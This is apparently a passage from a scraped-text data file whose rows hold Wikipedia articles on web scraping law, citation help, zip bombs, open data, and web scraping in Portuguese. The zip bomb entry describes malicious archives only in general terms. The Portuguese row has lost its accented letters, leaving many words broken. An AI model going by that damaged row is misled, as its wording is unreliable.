scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
337 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Help:Referencing_for_beginners | One of the key policies of Wikipedia is that all article content has to be verifiable. This means that reliable sources must be able to support the material. All quotations, any material whose verifiability has been challenged or is likely to be challenged, and contentious material (whether negative, positive, or neutral) about living persons must include an inline citation to a source that directly supports the material. This also means that Wikipedia is not the place for original work, archival findings that have not been published, or evidence from any source that has not been published. If you are adding new content, it is your responsibility to add sourcing information along with it. Material provided without a source is significantly more likely to be removed from an article. Sometimes it will be tagged first with a "citation needed" template to give editors a chance to find and add sources, but some editors will simply remove it because they question its veracity. This tutorial will show you how to add inline citations to articles, and also briefly explain what Wikipedia considers to be a reliable source. Inline citations are usually small, numbered footnotes like this. 1 They are generally added either directly following the fact that they support, or at the end of the sentence that they support, following any punctuation. When clicked, they take the reader to a citation in a reference section near the bottom of the article. While editing a page that uses the most common footnote style, you will see inline citations displayed between ref ... ref tags. If you are creating a new page, or adding references to a page that didn't previously have any, remember to add a References section like the one below near the end of the article: Note: This is by far the most popular system for inline citations, but sometimes you will find other styles being used in an article. This is acceptable, and you shouldn't change it or mix styles. To add a new reference, just copy and modify an existing one. Manually adding references can be a slow and tricky process. Fortunately, there is a tool called "RefToolbar" built into the Wikipedia edit window, which makes it much easier. To use it, click on Cite at the top of the edit window, having already positioned your cursor after the sentence or fact you wish to reference. Then select one of the 'Templates' from the dropdown menu that best suits the type of source. These are: A template window then pops up, where you fill in as much information as possible about the source, and give a unique name for it in the "Ref name" field. Click the "Insert" button, which will add the required wikitext in the edit window. If you wish, you can also "Preview" how your reference will look first. Some fields (such as a web address, also known as a URL) will have a icon next to them. After filling in this field, you can click it to handily autofill the remaining fields. It doesn't always work properly, though, so be sure to double check it. Often, you will want to use the same source more than once in an article to support multiple facts. In this case, you can click Named references in the toolbar, and select a previously added source to re-use. As an alternative to the RefToolbar, it is possible to insert citations in the source editor using a similar automated tool as the one used in the visual editor. For this, you need to enable the 2017 wikitext editor in your preferences. You will then be able to edit the source of pages while inserting citations using the automated tool of the visual editor. Wikipedia articles require reliable, published sources that directly support the information presented in the article. Now you know how to add sources to an article, but which sources should you use? The word "source" in Wikipedia has three meanings: the work itself (for example, a document, article, paper, or book), the creator of the work (for example, the writer), and the publisher of the work (for example, Cambridge University Press). All three can affect reliability. Reliable sources are those with a reputation for fact-checking and accuracy. They tend to have an editorial process with multiple people scrutinizing work before it is published. Academic and peer-reviewed publications are usually the most reliable sources. Other reliable sources include university textbooks, books published by respected publishing houses, magazines, journals, and news coverage (not opinions) from mainstream newspapers. Self-published media, where the author and publisher are the same, are usually not acceptable as sources. These can include newsletters, personal websites, press releases, patents, open wikis, personal or group blogs, and tweets. However, if an author is an established expert with a previous record of third-party publications on a topic, their self-published work may be considered reliable for that particular topic. Whether a source is usable also depends on context. Sources that are reliable for some material are not reliable for other material. For instance, otherwise unreliable self-published sources are usually acceptable to support uncontroversial information about the source's author. You should always try to use the best possible source, particularly when writing about living people. These are general guidelines, but the topic of reliable sources is a complicated one, and is impossible to fully cover here. You can find more information at Wikipedia:Verifiability and at Wikipedia:Reliable sources. There is also a list of commonly used sources with information on their reliability. Try it Take a quiz on reliable sources |
338 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Zip_bomb | In computing, a zip bomb, also known as a decompression bomb or zip of death (ZOD), is a malicious archive file designed to crash or render useless the program or system reading it. The older the system or program, the more likely it is to fall for it. It is often employed to disable antivirus software, in order to create an opening for more traditional malware. 1 A zip bomb allows a program to function normally, but, instead of hijacking the program's operation, creates an archive that requires an excessive amount of time, disk space, or memory to unpack. 2 Most modern antivirus programs can detect whether a file is a zip bomb in order to avoid unpacking it. 3 A zip bomb is usually a small file for ease of transport and to avoid suspicion. However, when the file is unpacked, its contents are more than the system can handle. One example of a zip bomb is the file 42.zip, which is a zip file consisting of 42 kilobytes of compressed data, containing five layers of nested zip files in sets of 16, each bottom-layer archive containing a 4.3 gigabyte (4294967295 bytes; 4 GiB 1 B) file for a total of 4.5 petabytes (4503599626321920 bytes; 4 PiB 1 MiB) of uncompressed data. 4 This zip bomb is freely available for download online. In many anti-virus scanners, only a few layers of recursion are performed on archives to help prevent attacks that would cause a buffer overflow, an out-of-memory condition, or exceed an acceptable amount of program execution time. Zip bombs often rely on repetition of identical files to achieve their extreme compression ratios. Dynamic programming methods can be employed to limit traversal of such files, so that only one file is followed recursively at each level, effectively converting their exponential growth to linear. |
339 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Open_data | Open data is data that is openly accessible, exploitable, editable and shareable by anyone for any purpose. Open data is licensed under an open license. 1 2 3 The goals of the open data movement are similar to those of other "open( source) movements such as open-source software, open-source hardware, open content, open specifications, open education, open educational resources, open government, open knowledge, open access, open science, and the open web. The growth of the open data movement is paralleled by a rise in intellectual property rights. 4 The philosophy behind open data has been long established (for example in the Mertonian tradition of science), but the term "open data" itself is recent, gaining popularity with the rise of the Internet and World Wide Web and, especially, with the launch of open-data government initiatives Data.gov, Data.gov.uk and Data.gov.in. Open data can be linked data - referred to as linked open data. One of the most important forms of open data is open government data (OGD), which is a form of open data created by ruling government institutions. Open government data's importance is born from it being a part of citizens' everyday lives, down to the most routine mundane tasks that are seemingly far removed from government. The abbreviation FAIR O data is sometimes used to indicate that the dataset or database in question complies with the principles of FAIR data and carries an explicit data capable open license. The concept of open data is not new, but a formalized definition is relatively new. Open data as a phenomenon denotes that governmental data should be available to anyone with a possibility of redistribution in any form without any copyright restriction. 5 One more definition is the Open Definition which can be summarized as "a piece of data is open if anyone is free to use, reuse, and redistribute it subject only, at most, to the requirement to attribute and or share-alike. 6 Other definitions, including the Open Data Institute's "open data is data that anyone can access, use or share, have an accessible short version of the definition but refer to the formal definition. 7 Open data may include non-textual material such as maps, genomes, connectomes, chemical compounds, mathematical and scientific formulae, medical data, and practice, bioscience and biodiversity. A major barrier to the open data movement is the commercial value of data. Access to, or re-use of, data is often controlled by public or private organizations. Control may be through access restrictions, licenses, copyright, patents and charges for access or re-use. Advocates of open data argue that these restrictions detract from the common good and that data should be available without restrictions or fees. Creators of data do not consider the need to state the conditions of ownership, licensing and re-use; instead presuming that not asserting copyright enters the data into the public domain. For example, many scientists do not consider the data published with their work to be theirs to control and consider the act of publication in a journal to be an implicit release of data into the commons. The lack of a license makes it difficult to determine the status of a data set and may restrict the use of data offered in an "Open" spirit. Because of this uncertainty it is possible for public or private organizations to aggregate said data, claim that it is protected by copyright, and then resell it. Open data can come from any source. This section lists some of the fields that publish (or at least discuss publishing) a large amount of open data. The concept of open access to scientific data was established with the formation of the World Data Center system, in preparation for the International Geophysical Year of 1957 1958. 8 The International Council of Scientific Unions (now the International Council for Science) oversees several World Data Centres with the mission to minimize the risk of data loss and to maximize data accessibility. 9 While the open-science-data movement long predates the Internet, the availability of fast, readily available networking has significantly changed the context of Open science data, as publishing or obtaining data has become much less expensive and time-consuming. 10 The Human Genome Project was a major initiative that exemplified the power of open data. It was built upon the so-called Bermuda Principles, stipulating that: "All human genomic sequence information … should be freely available and in the public domain in order to encourage research and development and to maximize its benefit to society". 11 More recent initiatives such as the Structural Genomics Consortium have illustrated that the open data approach can be used productively within the context of industrial R D. 12 In 2004, the Science Ministers of all nations of the Organisation for Economic Co-operation and Development (OECD), which includes most developed countries of the world, signed a declaration which states that all publicly funded archive data should be made publicly available. 13 Following a request and an intense discussion with data-producing institutions in member states, the OECD published in 2007 the OECD Principles and Guidelines for Access to Research Data from Public Funding as a soft-law recommendation. 14 Examples of open data in science: There are a range of different arguments for government open data. 19 20 Some advocates say that making government information available to the public as machine readable open data can facilitate government transparency, accountability and public participation. "Open data can be a powerful force for public accountability—it can make existing information easier to analyze, process, and combine than ever before, allowing a new level of public scrutiny. 21 Governments that enable public viewing of data can help citizens engage within the governmental sectors and "add value to that data. 22 Open data experts have nuanced the impact that opening government data may have on government transparency and accountability. In a widely cited paper, scholars David Robinson and Harlan Yu contend that governments may project a veneer of transparency by publishing machine-readable data that does not actually make government more transparent or accountable. 23 Drawing from earlier studies on transparency and anticorruption, 24 World Bank political scientist Tiago C. Peixoto extended Yu and Robinson's argument by highlighting a minimal chain of events necessary for open data to lead to accountability: Some make the case that opening up official information can support technological innovation and economic growth by enabling third parties to develop new kinds of digital applications and services. 26 Several national governments have created websites to distribute a portion of the data they collect. It is a concept for a collaborative project in the municipal Government to create and organize culture for Open Data or Open government data. Additionally, other levels of government have established open data websites. There are many government entities pursuing Open Data in Canada. Data.gov lists the sites of a total of 40 US states and 46 US cities and counties with websites to provide open data, e.g., the state of Maryland, the state of California, US 27 and New York City. 28 At the international level, the United Nations has an open data website that publishes statistical data from member states and UN agencies, 29 and the World Bank published a range of statistical data relating to developing countries. 30 The European Commission has created two portals for the European Union: the EU Open Data Portal which gives access to open data from the EU institutions, agencies and other bodies 31 and the European Data Portal that provides datasets from local, regional and national public bodies across Europe. 32 The two portals were consolidated to data.europa.eu on April 21, 2021. Italy is the first country to release standard processes and guidelines under a Creative Commons license for spread usage in the Public Administration. The open model is called the Open Data Management Cycle and was adopted in several regions such as Veneto and Umbria. 33 34 35 Main cities like Reggio Calabria and Genova have also adopted this model. citation needed 36 In October 2015, the Open Government Partnership launched the International Open Data Charter, a set of principles and best practices for the release of governmental open data formally adopted by seventeen governments of countries, states and cities during the OGP Global Summit in Mexico. 37 In July 2024, the OECD adopted Creative Commons CC-BY 4.0 licensing for its published data and reports. 38 Many non-profit organizations offer open access to their data, as long it does not undermine their users', members' or third party's privacy rights. In comparison to for-profit corporations, they do not seek to monetize their data. OpenNWT launched a website offering open data of elections. 39 CIAT offers open data to anybody who is willing to conduct big data analytics in order to enhance the benefit of international agricultural research. 40 DBLP, which is owned by a non-profit organization Dagstuhl, offers its database of scientific publications from computer science as open data. 41 Hospitality exchange services, including Bewelcome, Warm Showers, and CouchSurfing (before it became for-profit) have offered scientists access to their anonymized data for analysis, public research, and publication. 42 43 44 45 46 At a small level, a business or research organization's policies and strategies towards open data will vary, sometimes greatly. One common strategy employed is the use of a data commons. A data commons is an interoperable software and hardware platform that aggregates (or collocates) data, data infrastructure, and data-producing and data-managing applications in order to better allow a community of users to manage, analyze, and share their data with others over both short- and long-term timelines. 47 48 49 Ideally, this interoperable cyberinfrastructure should be robust enough "to facilitate transitions between stages in the life cycle of a collection" of data and information resources 47 while still being driven by common data models and workspace tools enabling and supporting robust data analysis. 49 The policies and strategies underlying a data commons will ideally involve numerous stakeholders, including the data commons service provider, data contributors, and data users. 48 Grossman et al 48 suggests six major considerations for a data commons strategy that better enables open data in businesses and research organizations. Such a strategy should address the need for: Beyond individual businesses and research centers, and at a more macro level, countries like Germany 50 have launched their own official nationwide open data strategies, detailing how data management systems and data commons should be developed, used, and maintained for the greater public good. Opening government data is only a waypoint on the road to improving education, improving government, and building tools to solve other real-world problems. While many arguments have been made categorically citation needed , the following discussion of arguments for and against open data highlights that these arguments often depend highly on the type of data and its potential uses. Arguments made on behalf of open data include the following: It is generally held that factual data cannot be copyrighted. 59 Publishers frequently add copyright statements (often forbidding re-use) to scientific data accompanying publications. It may be unclear whether the factual data embedded in full text are part of the copyright. While the human abstraction of facts from paper publications is normally accepted as legal there is often an implied restriction on the machine extraction by robots. Unlike open access, where groups of publishers have stated their concerns, open data is normally challenged by individual institutions. citation needed Their arguments have been discussed less in public discourse and there are fewer quotes to rely on at this time. Arguments against making all data available as open data include the following: The paper entitled "Optimization of Soft Mobility Localization with Sustainable Policies and Open Data" 63 argues that open data is a valuable tool for improving the sustainability and equity of soft mobility in cities. The author argues that open data can be used to identify the needs of different areas of a city, develop algorithms that are fair and equitable, and justify the installation of soft mobility resources. The goals of the Open Data movement are similar to those of other "Open" movements. Formally both the definition of Open Data and commons revolve around the concept of shared resources with a low barrier to access. Substantially, digital commons include Open Data in that it includes resources maintained online, such as data. 68 Overall, looking at operational principles of Open Data one could see the overlap between Open Data and (digital) commons in practice. Principles of Open Data are sometimes distinct depending on the type of data under scrutiny. 69 Nonetheless, they are somewhat overlapping and their key rationale is the lack of barriers to the re-use of data(sets). 69 Regardless of their origin, principles across types of Open Data hint at the key elements of the definition of commons. These are, for instance, accessibility, re-use, findability, non-proprietarily. 69 Additionally, although to a lower extent, threats and opportunities associated with both Open Data and commons are similar. Synthesizing, they revolve around (risks and) benefits associated with (uncontrolled) use of common resources by a large variety of actors. Both commons and Open Data can be defined by the features of the resources that fit under these concepts, but they can be defined by the characteristics of the systems their advocates push for. Governance is a focus for both Open Data and commons scholars. 69 68 The key elements that outline commons and Open Data peculiarities are the differences (and maybe opposition) to the dominant market logics as shaped by capitalism. 68 Perhaps it is this feature that emerges in the recent surge of the concept of commons as related to a more social look at digital technologies in the specific forms of digital and, especially, data commons. Application of open data for societal good has been demonstrated in academic research works. 70 The paper "Optimization of Soft Mobility Localization with Sustainable Policies and Open Data" uses open data in two ways. First, it uses open data to identify the needs of different areas of a city. For example, it might use data on population density, traffic congestion, and air quality to determine where soft mobility resources, such as bike racks and charging stations for electric vehicles, are most needed. Second, it uses open data to develop algorithms that are fair and equitable. For example, it might use data on the demographics of a city to ensure that soft mobility resources are distributed in a way that is accessible to everyone, regardless of age, disability, or gender. The paper also discusses the challenges of using open data for soft mobility optimization. One challenge is that open data is often incomplete or inaccurate. Another challenge is that it can be difficult to integrate open data from different sources. Despite these challenges, the paper argues that open data is a valuable tool for improving the sustainability and equity of soft mobility in cities. An exemplification of how the relationship between Open Data and commons and how their governance can potentially disrupt the market logic otherwise dominating big data is a project conducted by Human Ecosystem Relazioni in Bologna (Italy). See: https: www.he-r.it wp-content uploads 2017 01 HUB-report-impaginato v1 small.pdf. This project aimed at extrapolating and identifying online social relations surrounding “collaboration” in Bologna. Data was collected from social networks and online platforms for citizens collaboration. Eventually data was analyzed for the content, meaning, location, timeframe, and other variables. Overall, online social relations for collaboration were analyzed based on network theory. The resulting dataset have been made available online as Open Data (aggregated and anonymized); nonetheless, individuals can reclaim all their data. This has been done with the idea of making data into a commons. This project exemplifies the relationship between Open Data and commons, and how they can disrupt the market logic driving big data use in two ways. First, it shows how such projects, following the rationale of Open Data somewhat can trigger the creation of effective data commons. The project itself was offering different types of support to social network platform users to have contents removed. Second, opening data regarding online social networks interactions has the potential to significantly reduce the monopolistic power of social network platforms on those data. Several funding bodies which mandate Open Access mandate Open Data. A good expression of requirements (truncated in places) is given by the Canadian Institutes of Health Research (CIHR): 71 Other bodies active in promoting the deposition of data as well as full text include the Wellcome Trust. An academic paper published in 2013 advocated that Horizon 2020 (the science funding mechanism of the EU) should mandate that funded projects hand in their databases as "deliverables" at the end of the project, so that they can be checked for third party usability then shared. 72 |
340 | https://en.wikipedia.org/wiki/Web_scraping | https://pt.wikipedia.org/wiki/Web_scraping | Web scraping (em portugu s, 'raspagem da web') uma forma de minera o que permite a extra o de dados de sites da web, convertendo-os em informa o estruturada para posterior an lise. O tipo mais b sico de coleta o download manual das p ginas ou copiando e colando o conte do, e isso pode ser feito por qualquer pessoa. Contudo, a web scraping geralmente feita por meio de um software que simula a navega o humana por diversos sites, extraindo-se informa es espec ficas. um campo em evolu o que compartilha um objetivo comum com a vis o da web sem ntica, uma iniciativa ambiciosa que ainda requer avan os no processamento de texto, compreens o sem ntica, intelig ncia artificial e intera o homem-computador. Web scraping muito semelhante indexa o web (utilizado pela maioria dos motores de busca), mas a motiva o final muito diferente. A indexa o web usada para ajudar a tornar os motores de busca mais eficientes; j a web scraping pode ser usada por diferentes raz es, tais como compara o de pre os online, monitoramento meteorol gico, pesquisas de mercado, coleta de dados governamentais, monitoramento de dados e, em alguns casos, roubo de informa o. Cada vez mais a tecnologia nos traz benef cios e nos dias atuais os neg cios est o extremamente tecnol gicos, sempre buscando por melhorias e reduzindo gastos de tempo e dinheiro. Muitas vezes o acesso aos dados n o f cil. Por mais que se desejasse que tudo estivesse dispon vel no formato da nossa prefer ncia, dados s o divulgados de forma diferente na internet. E se voc quiser combin los com outros dados ou explor los de maneira independente? Para se extrair alguns dados de websites de maneira manual, ou seja copiando e colando, muito esfor o ser necess rio e muito tempo ser perdido. Com o uso automatizado da web scraping essa pr tica poupar tempo, esfor o e por consequ ncia dinheiro. Pode-se us la para arquivar o conte do de um website, para se ter acesso offline posteriormente, ou para testar o pr prio website em busca de links quebrados. Todavia existem casos de uso desonesto, como fazer c pias ilegais de conte do. Alguns exemplos do uso da s o: Os scripts e aplicativos de web scraping simulam uma pessoa navegando normalmente em um site. Com estes scripts softwares o usu rio pode se conectar a um site e solicitar uma p gina, exatamente como um navegador faria. O servidor web ir enviar de volta a p gina requisitada e ent o os coletores processam as p ginas de dados, que s o n o estruturadas ou semiestruturadas, e convertem os dados em um formato estruturado. Uma vez que os dados est o em um formato estruturado, o usu rio pode manipula-los e analisa-los com facilidade. Existem algumas alternativas para se fazerweb scraping, tais como Algumas t cnicas mais comuns de web scraping s o as seguintes A pr tica da web scraping tem atra do muita controv rsia porque os termos de uso para alguns sites n o permitem certos tipos de minera o de dados. Web scraping pode ser considerada como roubo de propriedade intelectual. Infelizmente, algumas pessoas e empresas n o se preocupam com termos e condi es e extraem grandes quantidades de dados sem que haja permiss o para isso. Alguns exemplos de coletas maliciosas s o: Como um exemplo real, no Brasil, podemos citar o caso de uma empresa de recrutamento online acusada e condenada por concorr ncia desleal ao coletar dados de clientes de outra empresa. Portanto, al m de estar ciente de todos os aspectos legais do site do qual se quer realizar a extra o de dados importante estar atento para as normas legais referentes a: Evitar os ataques e web scraping indevidos est cada vez mais dif cil pois nem sempre clara a distin o entre o uso de dados motivado por interesses leg timos e o uso ilegal, mas poss vel tomar algumas medidas para impedir ou diminuir esses ataques, como: Al m das medidas citadas acima, sempre bom verificar as a es dos usu rios nas p ginas do website. Por exemplo, quando um browser solicita uma p gina, ele tamb m solicita e realiza downloads de imagens e CSS; j os web scraprs est o apenas interessados no conte do e ir o solicitar somente o HTML. Se isso acontecer por um longo per odo, com certeza esse usu rio est fazendo web scraping. Outra op o para impedir o uso indevido de imagens colocar uma marca d' gua que identifique o propriet rio do conte do. |
341 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-32 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be 